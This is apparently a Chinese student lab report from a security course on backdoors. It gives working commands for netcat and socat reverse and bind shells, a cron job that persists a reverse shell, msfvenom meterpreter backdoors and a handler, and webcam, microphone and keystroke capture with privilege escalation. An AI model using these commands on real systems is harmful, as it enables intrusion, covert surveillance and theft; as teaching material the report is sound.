2018-2019 Exp2 後門原理與實踐

2018-2019 Exp2 後門原理與實踐

目錄


1、實驗內容說明及基礎問題回答
2、工具準備linux

3、實驗過程web

4、問題與思考
shell



1、實驗內容說明及基礎問題回答


一、實驗內容
(1)使用netcat獲取主機操做Shell,cron啓動 (0.5分)windows

(2)使用socat獲取主機操做Shell, 任務計劃啓動 (0.5分)網絡

(3)使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell(0.5分)tcp

(4)使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)編輯器

(5)可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell(1分)加份內容一併寫入本實驗報告。工具

二、基礎問題回答
1)例舉你能想到的一個後門進入到你係統中的可能方式?ui

  • 破解Linux計算機帳號密碼
  • 替換login程序,提供特殊口令隱身登陸
  • 在文件系統中隱藏後門

(2)例舉你知道的後門如何啓動起來(win及linux)的方式?命令行

  • Linux:經過crontab功能將木馬設置爲定時啓動,控制主機保持監聽狀態就能週期性啓動後門,也能夠經過對正常然健的綁定注入shellcode開啓後門。
  • win:被動下載或接受後門程序,當受害方點擊運行該程序後門便會啓動。

(3)Meterpreter有哪些給你映像深入的功能?

  • 基本功能(基本的鏈接、執行指令)
  • 擴展功能(如蒐集用戶信息、安裝服務等功能)

(4)如何發現本身有系統有沒有被安裝後門?

  • 安裝殺毒軟件:能夠進行實時防禦,如老師課堂演示中在開啓軟件保護模式狀況下,如有後門可疑程序會即刻將其刪除。
  • 檢測網絡鏈接:查看是否有IP與本機創建鏈接

返回目錄



2、工具準備


  • 查看WindowsIP和LinuxIP
    • Windows下用命令ipconfig

    • Linux下用ifconfig

Windows得到Linuxshell
  • 使用ncat程序,輸入ncat.exe -l -p 5226監聽本機5226端口

  • 在kali中使用nc指令的-e選項,輸入nc 172.30.2.26 5226 -e /bin/sh反向鏈接Windows主機的5226端口

  • 在Windows端,得到kali的shell

Linux 得到Windows shell
  • 使用nc指令監聽5226端口

  • 在Windows下,使用ncat.exe程序的-e選項反向鏈接kali主機的5226端口

  • 此時kali能夠看到Windows的命令提示,能夠輸入相關Windows命令(此處輸入的是dir

使用nc傳輸數據
  • Windows監聽5226端口

  • Kali下鏈接到Windows的5226端口

  • 創建鏈接後傳輸數據

返回目錄



3、實驗過程

使用netcat獲取主機操做Shell,cron啓動

  • 在Windows下監聽5226端口

  • 在kali中,用crontab -e編輯一條定時任務,選擇編輯器3

  • 在最後一行添加30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh,意思是在每小時的第30分鐘反向鏈接Windows主機的5226端口

  • 時間到了23:30時,已經得到kali的shell,能夠輸入指令

使用socat獲取主機操做Shell, 任務計劃啓動

socatncat的加強版,它使用的格式是socat [options] <address> <address>,其中兩個address是必選項,而options 是可選項。
socat的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。

  • 在win10系統下,右擊屏幕左下角windows圖標,選擇「計算機管理」(或者直接搜索「計算機管理」)

  • 在任務計劃程序建立任務,填寫任務名稱,並新建一個觸發器

  • 在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5226 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5226,同時把cmd.exestderr重定向到stdout

  • 建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,找到你建立的任務雙擊後,能夠發現以前建立的任務已經開始運行

  • 此時,在Kali環境下輸入指令socat - tcp:172.30.2.26:5226,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5226端口,此時能夠發現已經成功得到了一個cmd shell

使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  • 輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.130 LPORT=5226 -f exe > 20165226_backdoor.exe生成後門程序

    注意此時IP地址爲LinuxIP

  • Windows下執行ncat.exe -lv 5226 > 20165226_backdoor.exe,進入接受模式
  • Linux中執行nc 172.30.2.26 5226 < 20165226_backdoor.exe,注意關閉病毒查殺軟件

    此時IP地址爲主機即WindowsIP

  • 傳送接收文件成功

  • 在kali中打開終端,輸入msfconsole指令進入msf控制檯

  • 輸入use exploit/multi/handler進入監聽模塊

  • 輸入set payload windows/meterpreter/reverse_tcp設置payload

  • 依次輸入set LHOST 192.168.170.130set LPORT 5226設置IP及端口

    注意此時IP地址爲LinuxIP,和生成後門程序時指定的IP相同

  • 設置完成,開始監聽exlpoit

  • 運行Windows下的後門程序

  • kali已經得到Windows主機的鏈接,並獲得遠程控制的shell

使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容

  • 使用record_mic指令能夠截獲一段音頻

  • 使用webcam_snap指令可使用攝像頭進行拍照

  • 使用screenshot指令能夠進行截屏

  • 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄

  • 先使用getuid指令查看當前用戶,使用getsystem指令進行提權

可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell

  • 使用命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.170.128 LPORT=5226 -x /root/20165226/exp2/pwn1 -f elf > 5226pwn生成以pwn1模板這個elf文件格式的shellcode文件5226pwn

  • 輸入指令msfconsole,進入msf命令行
use exploit/multi/handler    /*進入handler模式*/

set payload linux/x86/meterpreter/reverse_tcp  /*對應生成的後門程序設置payload*/

show options  /*查看當前信息狀態*/

set LHOST 192.168.170.128  /*設置LHOST,其中ip爲攻擊者Linux的ip*/

set LPORT 5226 /*設置LPORT*/

exploit /*啓動監聽*/

  • 在kali上運行後門文件5226pwn,在kali中執行pwn2時應先加權限 chmod +x 5226pwn
  • 此時攻擊者Linux上已經得到了被攻擊者Linux的鏈接,而且獲得了遠程控制的shell

返回目錄



4、問題與思考

  • 問題1:kali使用nc反彈鏈接後主機沒有任何顯示

  • 問題1解決方案:在空白處輸入命令,如ls等,再回車便可

  • 問題2:kali中使用cron啓動,但在編輯的時間點並未獲取kali的shell
  • 問題2解決方案:

經過從新查看編輯文件,發現並未寫入端口號

因而將最後一行改成30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh

  • 問題3:在進行第二個socat實驗時未成功得到cmd shell

  • 問題3解決方案:經過校對命令行,發現輸入命令時將-tcp:連在一塊兒了,正確書寫爲socat - tcp:....,必定注意之間的空格

  • 問題4:MSF監聽時最後沒法獲取信息

  • 問題4解決方案:發現是在IP設置時出現問題,從新啓動終端將步驟從頭調試。
    返回目錄

相關文章
相關標籤/搜索